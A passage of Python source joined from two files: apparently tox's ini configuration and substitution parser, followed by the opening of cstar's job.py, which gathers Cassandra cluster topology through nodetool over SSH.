name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(distshare=config.distshare)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = re.split(r"((?:\{[^}]+\})+)|,", envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = re.split(r"\{([^}]+)\}", env)
parts = [re.sub(r"\s+", "", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = re.search(r"^([\w{}\.!,-]+)\:\s+(.+)", line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
job.py
|
# Copyright 2017 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import queue
import time
import socket
import os
import threading
import functools
import pickle
import sys
import cstar.remote
import cstar.endpoint_mapping
import cstar.topology
from cstar.topology import Topology
import cstar.nodetoolparser
import cstar.state
import cstar.strategy
import cstar.jobrunner
import cstar.jobprinter
import cstar.jobwriter
from cstar.exceptions import BadSSHHost, NoHostsSpecified, HostIsDown, \
NoDefaultKeyspace, UnknownHost, FailedExecution
from cstar.output import msg, debug, emph, info, error, warn
MAX_ATTEMPTS = 3
@functools.lru_cache(None)
def ip_lookup(name):
return socket.gethostbyname(name)
class Job(object):
"""The class that wires all the business logic together.
Currently polluted by some business logic of it's own. The job handling and some small snippets of code
should be moved out of this class.
"""
def __init__(self):
self._connections = {}
self.results = queue.Queue()
self.handled_finished_jobs = set()
self.state = None
self.command = None
self.job_id = None
self.timeout = None
self.env = None
self.errors = []
self.do_loop = False
self.job_runner = None
self.key_space = None
self.output_directory = None
self.is_preheated = False
self.sleep_on_new_runner = None
self.sleep_after_done = None
self.ssh_username = None
self.ssh_password = None
self.ssh_identity_file = None
self.jmx_username = None
self.jmx_password = None
self.jmx_passwordfile = None
self.hosts_variables = dict()
self.returned_jobs = list()
self.schema_versions = list()
self.status_topology_hash = list()
self.resolve_hostnames = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.close()
if exc_type:
if exc_type == NoHostsSpecified:
error("No hosts specified")
elif exc_type in [BadSSHHost, NoDefaultKeyspace, HostIsDown, UnknownHost]:
error(exc_value)
def get_cluster_topology(self, seed_nodes):
cluster_names = list()
self.schema_versions = list()
self.status_topology_hash = list()
topologies = list()
count = 0
tried_hosts = []
for host in seed_nodes:
tried_hosts.append(host)
conn = self._connection(host)
describe_res = self.run_nodetool(conn, "describecluster")
status_res = self.run_nodetool(conn, "status")
if (describe_res.status == 0) and (status_res.status == 0):
(cluster_name, schema_version) = cstar.nodetoolparser.parse_describe_cluster(describe_res.out)
if cluster_name not in cluster_names:
cluster_names.append(cluster_name)
topologies.append(cstar.nodetoolparser.parse_nodetool_status(status_res.out, cluster_name, self.reverse_dns_preheat, self.resolve_hostnames))
self.schema_versions.append(schema_version)
self.status_topology_hash.append(topologies[len(topologies) - 1].get_hash())
count += 1
if count >= MAX_ATTEMPTS:
break
if len(topologies) > 0:
final_topology = set()
for i in range(len(topologies)):
final_topology.update(topologies[i].hosts)
return Topology(final_topology)
raise HostIsDown("Could not find any working host while fetching topology. Is Cassandra actually running? Tried the following hosts:",
", ".join([x.ip for x in tried_hosts]))
def get_cache_file_path(self, cache_type):
debug("Cache file: {}-{}-{}".format(cache_type, "-".join(sorted(self.schema_versions)), "-".join(sorted(self.status_topology_hash))))
return os.path.join(self.cache_directory, "{}-{}-{}".format(cache_type, "-".join(sorted(self.schema_versions)), "-".join(sorted(self.status_topology_hash))))
def maybe_get_data_from_cache(self, cache_type):
try:
cache_file = self.get_cache_file_path(cache_type)
if os.path.exists(cache_file):
debug("Getting {} from cache".format(cache_type))
cached_data = pickle.load(open(cache_file, 'rb'))
return cached_data
except Exception:
warn("Failed getting data from cache : {}".format(sys.exc_info()[2]))
debug("Cache miss for {}".format(cache_type))
return None
def reverse_dns_preheat(self, ips):
if self.is_preheated:
return
self.is_preheated = True
def get_host_by_addr(ip):
try:
socket.gethostbyaddr(ip)
except socket.herror:
pass
def create_lookup_thread(ip):
return threading.Thread(target=lambda: get_host_by_addr(ip))
print("Preheating DNS cache")
threads = [create_lookup_thread(ip) for ip in set(ips)]
for thread in threads:
thread.start()
for thread in threads:
# Don't wait around forever for slow DNS
thread.join(1.0)
print("Preheating done")
def get_keyspaces(self, conn):
cfstats_output = self.run_nodetool(conn, *("cfstats", "|", "grep", "Keyspace"))
return cstar.nodetoolparser.extract_keyspaces_from_cfstats(cfstats_output.out)
def get_endpoint_mapping(self, topology):
clusters = []
failed_hosts = []
mappings = []
count = 0
endpoint_mappings = self.maybe_get_data_from_cache("endpoint_mapping")
if endpoint_mappings is not None:
return endpoint_mappings
for host in topology.get_up():
if host.cluster in clusters:
# We need to fetch keyspaces on one node per cluster, no more.
continue
count = 0
conn = self._connection(host)
if self.key_space:
keyspaces = [self.key_space]
else:
keyspaces = self.get_keyspaces(conn)
has_error = True
for keyspace in keyspaces:
if not keyspace.startswith("system"):
debug("Fetching endpoint mapping for keyspace", keyspace)
res = self.run_nodetool(conn, *("describering", keyspace))
has_error = False
if res.status != 0 and not keyspace.startswith("system"):
has_error = True
break
describering = cstar.nodetoolparser.parse_nodetool_describering(res.out)
range_mapping = cstar.nodetoolparser.convert_describering_to_range_mapping(describering)
mappings.append(cstar.endpoint_mapping.parse(range_mapping, topology, lookup=ip_lookup))
if has_error:
if count >= MAX_ATTEMPTS:
failed_hosts += host
break
else:
clusters.append(host.cluster)
count += 1
if failed_hosts:
raise HostIsDown("Following hosts couldn't be reached: {}".format(', '.join(host.fqdn for host in failed_hosts)))
endpoint_mappings = cstar.endpoint_mapping.merge(mappings)
